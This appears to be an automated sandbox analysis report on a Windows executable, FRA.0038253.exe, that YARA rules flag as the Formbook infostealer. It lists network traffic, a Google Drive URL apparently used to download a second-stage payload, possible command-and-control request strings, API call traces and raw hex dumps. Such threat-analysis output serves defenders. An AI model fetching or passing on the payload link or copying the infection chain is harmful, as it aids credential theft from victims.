        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 22 May 2024 15:33:20 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 22 May 2024 15:33:23 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Wed, 22 May 2024 15:33:26 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:45 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:33:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:33:58 GMTContent-Type: text/htmlContent-Length: 197Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:34:01 GMTContent-Type: text/htmlContent-Length: 197Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:34:04 GMTContent-Type: text/htmlContent-Length: 197Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:34:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-Agent Data Ascii: 26a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /op6t/?x2=wN2xY&amp;nvddg=YctXgwSc3BFH36yF9ys3dkgcNMzODdMAg5UrK4hoOCtkU8eu6jJtgKS+79VookX26kbq7jB7bx1t6icTSvNHhm9auK9O3RFTYlK19WO6PR6V1RPvKp1uln4= was not found on this server.<HR><I>www.beersekes.com</I></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716392102.1269038556672615301X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:35:02 GMTX-Served-By: cache-bfi-krnt7300112-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLkPYl3Dc4B5QnXwwDz84vBQG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716392104.8279035854453713443X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:35:04 GMTX-Served-By: cache-bfi-krnt7300093-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLjYvXQYrV/LrhbkNY01ADWAG/hKs8AeY1T4OIbgnD+yxVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: PepyakaX-Wix-Request-Id: 1716392107.534903909656384024X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Wed, 22 May 2024 15:35:07 GMTX-Served-By: cache-bfi-krnt7300097-BFIX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdgm++C2XkuTvnlRFg2XiSDLVia: 1.1 googleglb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 May 2024 15:36:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 a9 2a bf 74 fd c0 72 6e 78 cf 84 7f 9b b3 95 e1 18 37 a6 d7 05 e0 a6 31 7f fb 66 65 06 46 67 b6 34 3c df 0c f4 ee bf ff fa fd 60 d4 0d ef 3a c6 ca d4 bb b7 96 79 b7 76 bd 00 d0 bb 4e 60 3a 50 ea ce 9a 07 4b 7d 6e de 5a 33 73 40 7e 70 96 63 05 96 61 0f fc 99 61 9b ba 98 05 e1 b9 d7 6e e0 a7 00 38 ae e5 cc cd 8f 50 2a b0 02 db 7c fb cf ff e3 7f fe 6f ff f3 7f fd e7 7f fd f3 ff fd e7 ff fd 3f ff f7 7f fe 57 07 2e fe c7 a9 73 ed af a7 70 f5 5f ff fc 7f fe f9 7f fd f3 7f e0 d5 9b 33 5a e1 8d 1f dc db 66 67 65 ce 2d 43 ef 1a b6 dd 7d 7b f6 cd c9 37 9f fb df c9 37 ff f8 aa d3 41 3a 3a 33 df ef f0 67 8e 3b 37 af 56 ee 7c 63 9b fe 19 dc 1a d8 ae 31 37 bd 33 c2 3e fe 37 ff fc 7c 66 bb 8e 39 ff 2b 14 78 6f 06 03 8d df f8 e6 85 78 79 92 ab ba 06 21 48 55 f7 bd 59 0c 22 5f 14 fe c5 e5 e6 96 1f 9c cd 7e f3 69 b1 6b 73 75 76 6d bb b3 0f 3e 1f c9 df d9 35 c8 de 4d f4 c5 63 dd 0e d2 01 54 fc e3 b9 99 d9 fa ef ec 2b 9e d2 f5 00 7c 58 db c6 fd 64 61 9b 1f a7 f8 31 98 5b 9e 39 0b 2c d7 99 cc 5c 7b b3 72 a6 64 18 4c 44 41 f8 7a ba b2 1c 3a 2a 26 b2 24 ac 3f 4e 97 a6 75 b3 0c e8 b3 b5 31 9f c3 68 9c a8 c3 f5 c7 8e d0 11 a6 2b c3 bb b1 9c 89 30 05 38 ae 37 f9 17 59 53 e0 ff e9 02 86 ca 44 94 a0 d0 8f 30 66 3c ee 5b 0f 
46 17 f7 83 69 df 9a 81 35 33 3a 3f 99 1b 33 f9 c9 7d ef 99 e6 7b c3 f1 39 1f 3e 06 30 f6 ad c5 f4 da 98 7d b8 f1 dc 8d 33 9f fc cb 62 b1 98 0e ee cc eb 0f 56 30 08 8c f5 60 09 2d b2 b1 55 03 8a 36 f0 a0 de da f0 60 74 6e 51 e9 4c 1c 37 e8 f1 29 45 d3 ef 44 bc 70 41 ad 2c 6c f7 6e f0 71 b2 b4 e6 73 d3 d9 fe 81 0c c3 4e 2f a1 5b 14 24 65 fd b1 ff 90 86 50 03 60 1b 3e ba 42 d5 77 05 cd f8 00 2c 7a 40 70 09 eb 6e 97 d9 52 a6 e7 b9 1e 05 18 f1 54 d8 d1 f4 ab 95 e9 6c 06 58 18 3b 0e 9e cf cd 39 d7 bc ca c0 98 61 99 08 ed 20 70 d7 80 ba 19 13 ca e0 e6 00 6e 1b 36 41 44 59 3b 40 33 ca c9 db 25 15 99 d2 a9 11 30 1e 6b d0 aa 1d 4c 86 27 d6 e2 7e 70 ed b9 77 20 ba 57 b7 96 6f 5d db 59 98 aa d2 98 b8 1d 6d 2a e5 07 6b 4b 92 ce 71 af 2d db 1c 44 32 7d 45 25 9a 8b 1e fb 9b 6b 64 f1 95 bb 36 41 4b c7 a2 1f 09 fe 0e be 5c 2d 5c 17 06 ff 60 ee de 39 3b 05 b5 bc 21 3b 6a 55 b5 2f 24 bc a9 38 ed 02 d7 58 3c 4b 89 2a 81 cb 5b 49 b7 47 ca 9a 4c 55 db 32 5e 3e a0 0a 9f 88 a0 7f 8d 4d e0 4e f3 bd 92 02 96 ad 96 d5 48 5f 37 a5 26 03 ab 84 86 92
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 May 2024 15:36:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encoding
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: FRA.0038253.exe, FRA.0038253.exe, 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000000.00000000.2068548890.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000003.00000000.2484943484.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: FRA.0038253.exe, 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000000.00000000.2068548890.000000000040A000.00000008.00000001.01000000.00000003.sdmp, FRA.0038253.exe, 00000003.00000000.2484943484.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: FRA.0038253.exe, 00000003.00000001.2485904531.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: FRA.0038253.exe, 00000003.00000001.2485904531.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: FRA.0038253.exe, 00000003.00000002.2971794189.000000000532D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2938213391.000000000532D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3
        Source: FRA.0038253.exe, 00000003.00000003.2938213391.0000000005315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&
        Source: FRA.0038253.exe, 00000003.00000002.2971794189.000000000532D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2938213391.000000000532D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3P
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/2
        Source: FRA.0038253.exe, 00000003.00000002.2971981670.0000000005352000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000002.2971676746.00000000052E8000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2675158808.0000000005366000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2868413342.0000000005366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download
        Source: FRA.0038253.exe, 00000003.00000002.2971676746.00000000052E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1sSTbdeAy6HZYgZE2D-KGpyeTtdrEakj3&export=download(
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: FRA.0038253.exe, 00000003.00000003.2647988404.00000000053AC000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000536D000.00000004.00000020.00020000.00000000.sdmp, FRA.0038253.exe, 00000003.00000003.2647860234.000000000535E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownHTTPS traffic detected: 142.250.69.206:443 -> 192.168.11.30:49793 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.33.97:443 -> 192.168.11.30:49794 version: TLS 1.2
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004054D9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054D9

        E-Banking Fraud

        Source: Yara matchFile source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000005.00000002.7156734462.00000000043A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2959029682.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000006.00000002.7155964174.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.7156338070.0000000003A50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.2986365523.0000000036400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357234E0 NtCreateMutant,LdrInitializeThunk,3_2_357234E0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35722D10 NtQuerySystemInformation,LdrInitializeThunk,3_2_35722D10
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35722B90 NtFreeVirtualMemory,LdrInitializeThunk,3_2_35722B90
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35723C30 NtOpenProcessToken,3_2_35723C30
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35723C90 NtOpenThread,3_2_35723C90
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_357238D0 NtGetContextThread,3_2_357238D0
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 3_2_35724570 NtSuspendThread,3_2_35724570
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: 0_2_004033A2 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A2
        Source: C:\Users\user\Desktop\FRA.0038253.exeFile created: C:\Windows\resources\0409
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 35725050 appears 34 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 35737BE4 appears 60 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 3576EF10 appears 36 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 3575E692 appears 52 times
        Source: C:\Users\user\Desktop\FRA.0038253.exeCode function: String function: 356DB910 appears 172 times
        Source: FRA.0038253.exeStatic PE information: invalid certificate
        Source: FRA.0038253.exe, 00000003.00000003.2867931647.0000000035483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FRA.0038253.exe
        Source: FRA.0038253.exe, 00000003.00000002.2985481380.0000000035980000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs FRA.0038253.exe
        Source: FRA.0038253.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.7156623320.0000000004360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.7154033931.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
